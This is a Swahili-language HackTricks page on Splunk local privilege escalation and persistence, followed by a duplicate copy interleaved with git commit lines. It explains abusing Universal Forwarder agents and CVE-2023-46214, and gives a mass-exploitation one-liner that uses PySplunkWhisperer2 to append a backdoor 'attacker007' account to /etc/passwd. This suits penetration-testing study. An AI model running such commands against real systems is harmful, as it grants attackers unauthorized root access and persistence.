hacktricks/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md

# Splunk LPE na Uthabiti

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

Ikiwa unafanya **uchunguzi** wa mashine **ndani** au **nje**, ukigundua **Splunk inayoendesha** (bandari 8090), ikiwa una bahati ya kujua **vitambulisho halali**, unaweza **kutumia huduma ya Splunk** ku **tekeleza kikao** kama mtumiaji anayeendesha Splunk. Ikiwa root inaendesha, unaweza kuongeza mamlaka hadi kufikia root.

Pia, ikiwa tayari ni root na huduma ya Splunk haiisikilizi tu kwenye localhost, unaweza **kuiba** faili ya **nywila** kutoka kwa huduma ya Splunk na **kuvunja** nywila, au **kuongeza vitambulisho vipya** kwake. Na kudumisha uthabiti kwenye mwenyeji.

Katika picha ya kwanza hapa chini unaweza kuona jinsi ukurasa wa wavuti wa Splunkd unavyoonekana.


## Muhtasari wa Kudukua Mawakala wa Splunk Universal Forwarder

Kwa maelezo zaidi angalia chapisho [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). Hii ni muhtasari tu:

**Muhtasari wa Kudukua:**
Kudukua mawakala wa Splunk Universal Forwarder (UF) inaruhusu wadukuzi wenye nenosiri la wakala kutekeleza nambari ya aina yoyote kwenye mifumo inayotumia wakala, na hivyo kuhatarisha mtandao mzima.

**Mambo Muhimu:**
- Mawakala wa UF hawathibitishi ujio wa uhusiano au uhalali wa nambari, hivyo kuwa hatarini kwa utekelezaji usiohalali wa nambari.
- Njia za kawaida za kupata nywila ni pamoja na kuzipata kwenye saraka za mtandao, kushiriki faili, au nyaraka za ndani.
- Kudukua kwa mafanikio kunaweza kusababisha ufikiaji wa kiwango cha SYSTEM au root kwenye mwenyeji uliodukuliwa, utoroshaji wa data, na uingizaji wa mtandao zaidi.

**Utekelezaji wa Kudukua:**
1. Mshambuliaji anapata nywila ya wakala wa UF.
2. Anatumia API ya Splunk kutuma amri au hati kwa mawakala.
3. Hatua zinazowezekana ni pamoja na kuchambua faili, kubadilisha akaunti za mtumiaji, na kudhoofisha mfumo.

**Athari:**
- Kudukua mtandao mzima na ruhusa za kiwango cha SYSTEM/root kwenye kila mwenyeji.
- Uwezekano wa kuzima kumbukumbu ili kuepuka kugunduliwa.
- Usanikishaji wa mlango wa nyuma au ransomware.

**Amri ya Mfano kwa Kudukua:**
```bash
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
```
**Exploits za umma:**
* https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
* https://www.exploit-db.com/exploits/46238
* https://www.exploit-db.com/exploits/46487


## Kutumia Maswali ya Splunk

**Kwa maelezo zaidi angalia chapisho [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)**

**CVE-2023-46214** iliruhusu kupakia hati ya kiholela kwenye **`$SPLUNK_HOME/bin/scripts`** na kisha ilieleza kwamba kwa kutumia swali la utafutaji **`|runshellscript script_name.sh`** ilikuwa inawezekana **kutekeleza** **hati** iliyo stored hapo.


<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated to Swahili 2024-02-11 02:13:58 +00:00			`# Splunk LPE na Uthabiti`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2023-12-30 20:49:49 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [The PEASS Family](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`Ikiwa unafanya uchunguzi wa mashine ndani au nje, ukigundua Splunk inayoendesha (bandari 8090), ikiwa una bahati ya kujua vitambulisho halali, unaweza kutumia huduma ya Splunk ku tekeleza kikao kama mtumiaji anayeendesha Splunk. Ikiwa root inaendesha, unaweza kuongeza mamlaka hadi kufikia root.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Pia, ikiwa tayari ni root na huduma ya Splunk haiisikilizi tu kwenye localhost, unaweza kuiba faili ya nywila kutoka kwa huduma ya Splunk na kuvunja nywila, au kuongeza vitambulisho vipya kwake. Na kudumisha uthabiti kwenye mwenyeji.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Katika picha ya kwanza hapa chini unaweza kuona jinsi ukurasa wa wavuti wa Splunkd unavyoonekana.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00


Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Muhtasari wa Kudukua Mawakala wa Splunk Universal Forwarder`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Kwa maelezo zaidi angalia chapisho [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). Hii ni muhtasari tu:`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Muhtasari wa Kudukua:`
			`Kudukua mawakala wa Splunk Universal Forwarder (UF) inaruhusu wadukuzi wenye nenosiri la wakala kutekeleza nambari ya aina yoyote kwenye mifumo inayotumia wakala, na hivyo kuhatarisha mtandao mzima.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Mambo Muhimu:`
			`- Mawakala wa UF hawathibitishi ujio wa uhusiano au uhalali wa nambari, hivyo kuwa hatarini kwa utekelezaji usiohalali wa nambari.`
			`- Njia za kawaida za kupata nywila ni pamoja na kuzipata kwenye saraka za mtandao, kushiriki faili, au nyaraka za ndani.`
			`- Kudukua kwa mafanikio kunaweza kusababisha ufikiaji wa kiwango cha SYSTEM au root kwenye mwenyeji uliodukuliwa, utoroshaji wa data, na uingizaji wa mtandao zaidi.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Utekelezaji wa Kudukua:`
			`1. Mshambuliaji anapata nywila ya wakala wa UF.`
			`2. Anatumia API ya Splunk kutuma amri au hati kwa mawakala.`
			`3. Hatua zinazowezekana ni pamoja na kuchambua faili, kubadilisha akaunti za mtumiaji, na kudhoofisha mfumo.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Athari:`
			`- Kudukua mtandao mzima na ruhusa za kiwango cha SYSTEM/root kwenye kila mwenyeji.`
			`- Uwezekano wa kuzima kumbukumbu ili kuepuka kugunduliwa.`
			`- Usanikishaji wa mlango wa nyuma au ransomware.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Amri ya Mfano kwa Kudukua:`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00			```bash
			for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Exploits za umma:`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00			`* https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2`
			`* https://www.exploit-db.com/exploits/46238`
			`* https://www.exploit-db.com/exploits/46487`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Kutumia Maswali ya Splunk`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Kwa maelezo zaidi angalia chapisho [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			CVE-2023-46214 iliruhusu kupakia hati ya kiholela kwenye `$SPLUNK_HOME/bin/scripts` na kisha ilieleza kwamba kwa kutumia swali la utafutaji `\|runshellscript script_name.sh` ilikuwa inawezekana kutekeleza hati iliyo stored hapo.
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

GITBOOK-4174: change request with no subject merged in GitBook 2023-12-04 09:33:43 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2023-12-30 20:49:49 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [The PEASS Family](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`